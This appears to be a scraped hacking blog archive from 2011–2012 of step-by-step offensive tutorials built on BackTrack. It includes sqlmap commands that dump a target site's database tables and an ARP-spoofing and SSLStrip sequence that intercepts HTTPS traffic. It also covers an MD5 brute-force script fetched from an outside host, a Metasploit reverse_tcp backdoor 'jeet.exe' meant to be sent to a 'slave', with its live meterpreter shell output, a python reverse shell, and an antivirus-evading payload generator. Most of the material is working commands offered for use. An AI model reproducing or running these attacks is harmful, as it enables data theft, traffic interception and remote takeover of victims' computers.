Showing posts with label backtrack. Show all posts
Showing posts with label backtrack. Show all posts

Saturday, 14 July 2012

SQL Injection via SQL Map On Backtrack

Hack Website by SQL injection using sqlmap in BackTrack which is a linux based Operating System
suppose the target website is www.target.com/image.php?id=5
for checking for the vulnerability of the website just add ' at the end.. like this
www.target.com/image.php?id=5' then press Enter.. if an Error page appear then the website is vulnerable.... now start sqlmap in BackTrack...... type the following command
python ./sqlmap.py -u www.target.com/image.php?id=5 --dbs
this will give u the Database of the website now type
python ./sqlmap.py -u www.target.com/image.php?id=5 -D Database name --tables
this will give u the tables name.... now chose the Table name carefully...... then
python ./sqlmap.py -u www.target.com/image.php?id=5 -D Database name -T tablename --columns
this will give u the names of columns.... now chose column name carefully.....then
python ./sqlmap.py -u www.target.com/image.php?id=5 -D Database name -T tablename -C column name --dump
thats it..... you have done...........
for example:- Suppose the Database name is my_webarea and Table name is Admin_Page and column name is User_ID so the command will be
python ./sqlmap.py -u www.target.com/image.php?id=5 -D my_webarea -T Admin_Page -C User_ID --dump
hope you like... if you have any problem then Ask it in Comment!!!!!!!!!!!

Monday, 2 July 2012

Using beef plugin with Metasploit

1. Run the beef service
$/pentest/web/beef/beef -x -v

2. In another console, Run the Metasploit Console
$msfconsole

3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git

4. Move file beef.rb to msf/plugins and lib/beef to msf/lib

5. Install hpricot gem
$gem install hpricot

6. In the Metasploit console,

Saturday, 16 June 2012

Download Free Backtrack 5R2 OS


At last after fixing bugs and development of more than 42 tools, the updated version of backtrack 5R1&2 is released. Running on 3.2.6 kernek with awesome support of wireless.And it is the great and fastest version of  backtrack ever!
Advance Features:- 

  • More than 42 new tools .added
  • Extreme Bugs are fixed
  • Metasploit 4.2.0, SET V3.0 ,BeEF 0.4.3.2 are upgraded version
  • Updates of Ubuntu Included 

There are some other advanced features check the  official site of Backtrack

you can also update your existing backtrack by adding new update repository -

echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list 
apt-get update 

apt-get dist-upgrade     

Sunday, 27 May 2012

jasagerpwn - Jasager attack vector script for BackTrack 5 and Ubuntu.

This script is going to assume your using BackTrack 4/5 with /pentest/, if you have it somewhere else just adjust the variables accordingly.This can work with normal ubuntu as well, But keep in mind the setup of the OS will take some more work and general linux skill.The following dependencies are required for full functionality of the script..Dependencies: PHP5, Apache2, INSTALLED Metasploit,

Monday, 2 April 2012

Downlaod free Hacking for Dummies Ebook

Learn Basics Of hacking through this ebook. Get introduce yourself  with hacking
hacking+for+dummies Hacking for Dummies

HACKING FOR DUMMIES

Tuesday, 13 March 2012

Credential Attack Harvester Meathod Tutorial | Video Tutorial


Here is a Video Tutorial made by us to explain Credential Attack Harvester meathod.

Sunday, 11 March 2012

Install Backtrack in VMware player Tutorial

Here is a video to show how to install Backtrack on VMware player .


Wednesday, 7 March 2012

Crack SSL Using SSLStrip In BackTrack 5

SSL  - It was discovered by Moxie Marlinespike , he is a computer security researcher & also Co-founder at whisper systems . It is well know for work with both secure protocols (Https)& Android .









Advantage of Cracking SSLStrip :

  • Address bar uses http instead of secure https.
  • Sniffing becomes easy .

Things Required :
  • Backtrack 5
  • Arpspoof
  • IP Tables
  • SSL Strip
  • Netstat

Step By Step Gudie :

  • So first start up your Backtrack 5 terminal & type the following Command 



echo '1' > /proc/sys/net/ipv4/ip_forward




  • Now after typing this command the backtrack will be able to forward the packets, now we have to get little information about the gateway Ip , so to know more about our gateway IP we will type the following command 



netstat -nr




  • After we get some info about the gateway ip, then we will ARPSpoof to perform the attack 



arpspoof -i eth0 192.168.8.8




  • So in the above command eth0 represents the network interface card (NIC) or if you are using a wireless then it will be wlan0 . so in our case the default gateway is 192.168.1.1 . After that we have to Download sslstrip, which you can find from the official website .

  • Then after we have installed sslstrip now we have to make our firewall to redirect the traffic from Port 80 to Port 8080, so to do this type the following command 


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080





  • so our last step would be to make all the traffic go from ARPspoof tables



echo '1' > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 192.168.8.8







So finally we are done, now the ARPspoof will start capturing traffic & we have to use SSLstrip now so type the command below



sslstrip -l 8080








Now you have successfully cracked the SSLstrip !



Hope you all Like the Tutorial
Comments would be appreciated :)

Download Backtrack 5R2

After months of  development of bug fixes, upgrades & the addition of 42 new tools , the full version of Backtrack 5R1 is released . It is running on custom built 3.2.6 kernel with best wireless support .It is said that it is the fastest & best release of backtrack yet ! .





Advantages -  


  • Addition of 42 new tools .
  • Many Bugs Fixed 
  • Many Tools upgraded ( Metasploit 4.2.0, SET V3.0 ,BeEF 0.4.3.2 )
  • Ubuntu updates included 
  • Wiki updates ( How to )

And many more advantages . You can get more details from the official site of Backtrack

If you going to update your existing backtrack so you can add the new update repository -

echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list 
apt-get update 

apt-get dist-upgrade 







Monday, 20 February 2012

Post Exploitation To Manage Firewall And Antivirus

Firewall
1. Show Firewall Operation Mode
> netsh firewall show opmode

C:\Documents and Settings\Administrator>netsh firewall show opmodeDomain profile configuration:-------------------------------------------------------------------Operational mode                  = EnableException mode                    = EnableStandard profile configuration (current):----------------------------------------

Wednesday, 11 January 2012

Word List Generator

wlg: Word List Generator
version: 0.5
coded by white_sheep

site: http://www.marcorondini.eu - http://www.ihteam.net
twitter: http://www.twitter.com/white__sheep
 
Option
-h [ --help ] produce help message
-v [ --version ] show version
-r [ --credits ] show credits

-e [ --extract ] arg set string to extract

Sunday, 8 January 2012

Howto: Hacking web authentication with Bursuite

1. Set the browser proxy to Burpsuite

2. In the Burpsuite, go to Proxy -> Intercept -> "Intercept is on"


3. Go to Proxy -> Option -> "generate CA-signed per-host certificates" for each time the user connects to a SSL protected website, Burpsuite will
generate a server certificate for that host, signed by a unique CA
certificate which is generated in Burpsuite during its installation. The

Sunday, 1 January 2012

TCP Proxy for MITM Attacks in Metasploit


1. Arpspoofing Or whatever hacking technique that you can redirect traffic to attacker machine.



2. Use IPTABLE in attacker 

$ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 80



3.Download the module from Source.



4. Use the module with metasploit.



5. Have a nice Hack :)




Source: f0rki.at/tcp-proxy-for-mitm-attacks-in-metasploit.html


 





If you like my

Monday, 19 December 2011

Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5

This post is summary from Source. If you want to see all details please go to the Source.

CMS Identification

BlindElephant

 BlindElephant is a python based tool for fingerprinting the web
applications. This tool basically attempts to discover the version used
by comparing the static files at certain known locations against the
hashes which are pre-computed for the versions of those files

Sunday, 11 December 2011

MD5 Hash Cracking With Perl.



root@bt:~# Hi guys once again a simple but useful tutorial how to crack md5 hashes. If you have an password in md5 hash and you need password in plain text for this there is lot of tool'
> and online websites too but they wont crack all md5 hash if your hash exist in thier database they will give u plain text password but if not than u have to use some tool like 
> here we are using a perl script to crack an hash so i had encrypted an text "r2/." into a md5 hash which is "5d28a1f53e24a8b0a85d0a53348d49ad" so here we will try to decrypt it 

> again with perl in a plain text so first of all here we already know the leth of text is 4 and it is included with specail characters like ". /" etc so our job will be easy 
> but if we dont know the length and what kind of character included in hash then what? no problem we have some solution for that too ok lets began with first step if u are using linux here we are using back track for this first of all you need perl script so donalod and follow the steps to crack a hash i will try to explain each part of this script 


root@bt:~# wget http://bluerose.webuda.com/md5crack.rar


oot@bt:~# unrar x md5crack.rar


root@bt:~# perl md5crack.pl


root@bt:~# ok here is first option ./md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72


root@bt:~# './md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72
our command will be like this > perl md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72
ad is charset if we will use ad option that means it will try only lowercase alphabets and all digits 0-9 now 1 is minimum lenth of hash character like a b c etc and 3 is maximum lenth of hash so this command will try all lowercase alpha numerical from 1 to 3 lenth so if password is like abc or ab9 tc it will show us result now lets see next command line 


root@bt:~# './md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72
see here aA charset if we will use this option than it will try
lower,uppercase alpha numerical word like "Jeet123" and minimum length 3 and maximum is 3 it means it will try like this aaa,aab,aac ............aAc etc now lets move on last command line 




root@bt:~#'/md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72
here is charset is aAdx it will try lower,upperalpha numerical and specail charater ./*-+& etc. here minimum lenth is 1 and maximum is 10 to it will start from a to aaaaaaaaaa the first command will finish our tast fast but if hash included only lowercase alpha numerical word secound will try uppercase so it will took more than first command and thrid one will took more then first and second command so how to finish our job fast ok for cracking an hash i will say use more shell in one time like see normaly an pass length will be minimum 4 digits so we can start from 4 and maximum may be 10 or more so here what to do we can use 6 shell in one time for first command i will give u example here 
perl md5crack.pl 4 4 900150983cd24fb0d6963f7d28e17f72
perl md5crack.pl ad 4 4 <hash here> this command will try only 4 charcter lenght word so in second shell we can try 5 5 so that will try only 5 charcter lengh word 
perl md5crack.pl ad 5 5 <hash here> like this we can use 6 6, 7 7, 8 8 , etc so minimum and maximum length will be same so task will be finish fast and it depend on charset what kind of charset you are trying like ad,aA or aAdx now as i told here i have an example to make understand>>> text= "r2/." and encrypted  md5 hash  is "5d28a1f53e24a8b0a85d0a53348d49ad" we will try to crack it again in plain text here we will try command line >  perl md5crack.pl aAdx 4 4 5d28a1f53e24a8b0a85d0a53348d49ad


root@bt:~# perl md5crack.pl aAdx 4 4 5d28a1f53e24a8b0a85d0a53348d49ad
5d28a1f53e24a8b0a85d0a53348d49ad != da0df02b98b2c3b9cbbdf43587d56018 (uLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != d1c001e8867850b3c1433ba0ac938103 (vLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 0d75ced017fb9b8780d6c30f8e36a86b (wLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != c6c1115d33975689dfa7433422a5288b (xLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != ea5d6366e66c39611509b9e36d9853fa (yLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 9545a19052b086dd4615509cf861d062 (zLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 5f037f8a2e8160cf740ac02d559bb0fe (ALfa)
5d28a1f53e24a8b0a85d0a53348d49ad != b266bec7dfe619f023b93b8ca87fa762 (BLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 3601c4c04c4355c16e5bb388df65800c (CLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != dd4f0c6b20d288aacc0db568c26b19ae (DLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != b432ea04463991af047b6c4a1a9bdbbc (ELfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 07d179f416bcfd993a0c9beafd479e70 (FLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 663e4f51eb5c016df23ad06b4e7e766b (GLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != f1289bb711ed7327da215cc9405efd2d (HLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != f3c865b0b727f8047781c2fd38f30e6f (ILfa)
5d28a1f53e24a8b0a85d0a53348d49ad != f0a6fde524f2b7dd5cda8d45d6c41bd6 (JLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != ed40b98eb7d1351d53c5d777f876839c (KLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 3495e83370012d26050dbcdc95c42015 (LLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != c8b68f5c9365fcafa5884edaa98801b6 (MLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != e86bf9d6265191b8c63c3c963e6c9a92 (NLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 0cf5d8630ebb9cabc8db92cbbdb1d5c8 (OLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 2383f4b6f1117600e880127fb2641fcd (PLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 07f00734587164f59d4412ac4b170415 (QLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 1652ddeb95d31881ccb73b589f35563a (RLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != abbc084e67b158e646c0e1a203099067 (SLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 7dd1d31cf7e1c9030ad3b3e03811fcad (TLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != be5173f471c44ca32a44ad5d03b456be (ULfa)
5d28a1f53e24a8b0a85d0a53348d49ad != c5a73d7da1f995c5fff1429454ff8a46 (VLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 38caf84bd285eb5d2c5cb4e08ef730d0 (WLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != df71a25b9ad6f9bf01a559635b733083 (XLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 553117796a60d745d5c19107943f5abf (YLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != b1dd21008ac5cc4a8c9cb03f02fded59 (ZLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 89dbf10c22720fdd47411736da8a86d0 (1Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != b7f20e899623426ffd38d99218a215f2 (2Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != de271d671eaf1db39b9e8202654f610d (3Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 197359723ff9ccabe9e13d22ef616412 (4Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != fb62f20a2c81e65623cf400575e1850a (5Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != bdc2a4179810b0e37ea31239901d06c4 (6Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != e4565547c49e868cddf1ba49c85dbd5e (7Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != f70651b42b4997c9a8c42a7ddd7b7e73 (8Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 63e13a11b755c2bd7dc25817ba1ccb1b (9Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != e7c331e7937 snip...................


process here started how it is trying every thing we can see now when it will finish it will give us correct result se below 



5d28a1f53e24a8b0a85d0a53348d49ad != bd25e63fa49684f2b4e862670485048d ("1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 62875e810adc53487939aa311c770695 ($1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 677ab68f4a1cad69c494c891e2f06aa6 (%1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != c0397120d1b845287c1163a2ef4ea645 (&1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 47cedcd4aa4f17d6eb4d1fc764b24289 (/1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != f2226fade37e452c3337b4d486845258 ((1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != d335549958cb6f7bc30d9bceb0182599 ()1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 36ba42a32c7171b7a671cfa1e6089854 (=1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != c1c57fdc741385631385fd005bf06700 (?1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 0609508323bf700b1606c6b72169b7d8 (-1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != fc1e4aff82e6109d8471acb0279c00e3 (.1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 925a4422871639620285fc1a521424ea (:1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != e35df166288f8b675a38e4c9e39915dd (\1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 4991a349aee2145b4270211cb9155982 (*1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 06095b2620890747f1f1eec52c87daa0 ('1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 0609508323bf700b1606c6b72169b7d8 (-1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 68d126b1f8710d323ebbd88c9077726d (_1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 925a4422871639620285fc1a521424ea (:1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != fc1e4aff82e6109d8471acb0279c00e3 (.1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 33535a71dd3f6ce518ff4439c9086942 (;1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != a11ec1f07e10d299426cf6b3d77b3514 (,1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 807fed161fa993f41f5e73e06db002d3 (a2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 8962a9a33e0973e23cb82fbb2c00fe8c (b2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 4e9da6ec31a0fe9507795827db605dac (c2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 788ae10879ca928d00cd5079b6631d10 (d2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != ad6408b9ad9f5bde36548b720a42733f (e2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 527b287eeacc38f7aa9cdd07ad605871 (f2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 825a9fe2400e410c668e38bbd7e5da43 (g2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 860f12af83973aa8d4f85108e3dbcc4a (h2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 859d2caa4780f37f725acbb7e2f2c984 (i2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 8753b399d39090b695040ebfb39037d4 (j2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != bfcb8d3eaca7f9b7571112a40802d477 (k2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 7348e7b0caf781e4a6b9221ecb9694a4 (l2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != a3d691f375ea2b2766644c9171dde234 (m2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 607db55f1ba78e363ae8bb1921478c3a (n2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != ec58f0995b89d9777fc21fd15890cfdb (o2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != d66d37eef3815a28d83e854249f6c734 (p2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 842d107a1c737608dcb1b12f1f2729dc (q2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 5d28a1f53e24a8b0a85d0a53348d49ad (r2/.)


**** Password Cracked! => r2/.
root@bt:~#  we got the plain text i hope it will helps if you are not using linux but want to try it on windows i will write an short tut how to use perl on windows or any Question feel free to ask 


Note: use perl md5crac.pl instead of ./md5crack.pl 
correct command will look like this >>>>>>>>>>>perl md5crack.pl ad 5 5 <hash>
if u will try this it will ask for permission >>>>>>>./md5crack.pl ad 55 <hash> wil not work untill u wont change permission of the script .

Monday, 5 December 2011

Back door(RAT) Metasploit on Back Track 5






root@bt:~# Backdoor(RAT) is powerful way of hack a system as far I know we can say that there is two kind of attack one on LAN and second one over internet(out side our LAN network) well here we will try first one attack for education purpose than next will be for outside LAN network. If we will check our IP there is two kind of IP one we can say internal IP which start something like 192.168.1.1 and we can find it on windows'


>>>open terminal and type ifconfig like this 


root@bt:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:e1:93:4a  
          inet addr:192.168.1.101  Bcast:192.168.1.255  Mask:255.255.255.0

          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2343 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2039 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2216117 (2.2 MB)  TX bytes:480558 (480.5 KB)
          Interrupt:19 Base address:0x2000 


lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:95 errors:0 dropped:0 overruns:0 frame:0
          TX packets:95 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:6545 (6.5 KB)  TX bytes:6545 (6.5 KB)


root@bt:~# here inet addr:192.168.1.101 this is my internal ip for lan attack we have to  use internal IP and for Wan(out side LAN network) we have to use our external IP which we can find out fromhttp://whatsmyip.org. lets create a payload, windows/meterpreter/reverse_tcp is best for me but you can use other one too for check 'bash: syntax error near unexpected token `('
bash: follow this 


root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfpayload -l


Framework Payloads (228 total)
==============================


    Name                                             Description
    ----                                             -----------
    aix/ppc/shell_bind_tcp                           Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                          Spawn a shell on an established connection
    aix/ppc/shell_interact                           Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    bsd/sparc/shell_bind_tcp                         Listen for a connection and spawn a command shell
    bsd/sparc/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    bsd/x86/exec                                     Execute an arbitrary command
    bsd/x86/metsvc_bind_tcp                          Stub payload for interacting with a Meterpreter Service
    bsd/x86/metsvc_reverse_tcp                       Stub payload for interacting with a Meterpreter Service
    bsd/x86/shell/bind_tcp                           Listen for a connection, Spawn a command shell (staged)
    bsd/x86/shell/find_tag                           Use an established connection, Spawn a command shell (staged)
    bsd/x86/shell/reverse_tcp                        Connect back to the attacker, Spawn a command shell (staged)
    bsd/x86/shell_bind_tcp                           Listen for a connection and spawn a command shell
    bsd/x86/shell_find_port                          Spawn a shell on an established connection
    bsd/x86/shell_find_tag                           Spawn a shell on an established connection (proxy/nat safe)
    bsd/x86/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    bsdi/x86/shell/bind_tcp                          Listen for a connection, Spawn a command shell (staged)
    bsdi/x86/shell/reverse_tcp                       Connect back to the attacker, Spawn a command shell (staged)
    bsdi/x86/shell_bind_tcp                          Listen for a connection and spawn a command shell
    bsdi/x86/shell_find_port                         Spawn a shell on an established connection
    bsdi/x86/shell_reverse_tcp                       Connect back to attacker and spawn a command shell
    cmd/unix/bind_inetd                              Listen for a connection and spawn a command shell (persistent)
    cmd/unix/bind_netcat                             Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_perl                               Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_ruby                               Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/generic                                 Executes the supplied command
    cmd/unix/interact                                Interacts with a shell on an established socket connection
    cmd/unix/reverse                                 Creates an interactive shell through two inbound connections ...............................................read Description of payload and use as your requirement,  well we will use meterpreter/reverse_tcp for create backdoor.exe(rat) 


root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 x > /root/jeet.exe 
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.1.101", "LPORT"=>"4444"}
here is payload we can see lhost our internal IP and port to listen connection back you can use other port if u like and this file we can find at home folder if u want to create this on desktop use this >/root/Desktop/jeet.exe 
here we can change nick jeet.exe whatever u like 


Note :-  jeet.exe can be detected by antiruses because this is not Fud or encoded in next doc I will try to clear about bypassing AV's but  for testing here you have to silent or disable ur antivirus now before open this file we have to start a listener on local host first 


root@bt:~# msfconsole 


IIIIII    dTb.dTb        _.---._                                                                                                                                                    
  II     4'  v  'B   .'"".'/|`.""'.
  II     6.     .P  :  .' / |  `.  :
  II     'T;. .;P'  '.'  /  |    `.'
  II      'T; ;P'    `. /   |    .'
IIIIII     'YvP'       `-.__|__.-'


I love shells --egypt



       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 763 exploits - 404 auxiliary - 118 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r14281 updated 10 days ago (2011.11.18)


Warning: This copy of the Metasploit Framework was last updated 10 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:


msf > msf > use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set lhost 192.168.1.101
lhost => 192.168.1.101
msf  exploit(handler) > set lport 4444
lport => 4444
msf  exploit(handler) > exploit


[*] Started reverse handler on 192.168.1.101:4444 
[*] Starting the payload handler...

Same payload we have to use which we used in back door file, host and port should be same than finally give exploit 
command.If you see starting the payload handler ...........now we can send this file to our slave but as I said before this attack for LAN so we can test it on our windows system before that we have to diable our antivurs than open jeet.exe on windows and see what happen 
after opening file we can see this if every thing goes well 


[*] Started reverse handler on 192.168.1.101:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.100:27885) at 2011-11-28 21:32:52 +0300


meterpreter > meterpreter > shell
Process 4976 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


H:\ftp>ipconfig 
ipconfig 


Windows IP Configuration



Ethernet adapter Local Area Connection* 15:


   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 


Wireless LAN adapter Wireless Network Connection:


   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::1d69:435e:2a5d:d90f
   IPv4 Address. . . . . . . . . . . : 192.168.1.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1


.................................................


H:\ftp> now u can play with windows system. if u dont know what to do after this than ask I will try to make a docs on this how to control over slave pc after getting a session hope this helps 

 here i want to post an video which i created long before that shows same kind of attack http://www.youtube.com/user/jatin4u2020#p/u/14/8ymkcqslSRw


[#]This post was written by Mr.Jeet Kumar. Join his facebook group   Real Way Hacking

Friday, 11 November 2011

FUD Payload Generator for Backtrack By Coresec.org







Today based on Astr0baby’s article on how can we create a fully undetectable metasploit payload, i modified his REVERSE_TCP Payload Generator in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works:



#!/bin/bash
echo "************************************************************"
echo " Automatic

Monday, 24 October 2011

Python One Line Shellcode

This post will summary from the PaulDotCom post. If you want to full detail, please go to the Source.

1. We will write the simple python reverse tcp connect shell
import socket

import subprocess

s=socket.socket()

s.connect(("127.0.0.1",9000))

while 1:

p = subprocess.Popen(s.recv(1024), shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

s.send(

Monday, 3 October 2011

Howto: Install Aircrack-ng In Backtrack 5 On Samsung Galaxy Tab 10.1[P7500]


After installing Backtrack 5 on my Tab, I want to install aircrack that not provide in Backtrack 5 ARM. I find howto install it in android. So I found this post in the pastebin. Try it with yourself.



#!/bin/bash

# Aircrack-ng installer for BackTrack 5 on Android

# By Justin Barrick aka th3p4tri0t



# install dependency for libssl-dev

apt-get install zlib1g-dev



# install libssl-dev

Saturday, 1 October 2011

Howto: Install Backtrack 5 On Samsung Galaxy Tab 10.1 [P7500]

Do all the steps with you risk!!!!.

1. Download rooting file and transfer it to the tab
    - http://forum.xda-developers.com/attachment.php?attachmentid=593613&d=1305168395


2. Go into the recovery mode with hold "Power Button and Low Volumn Button" for rebooting and when you see the 2 icon press "Low Volumn" and press "High Volumn" or "Power Button" for go to recovery mode.

3. Choose "apply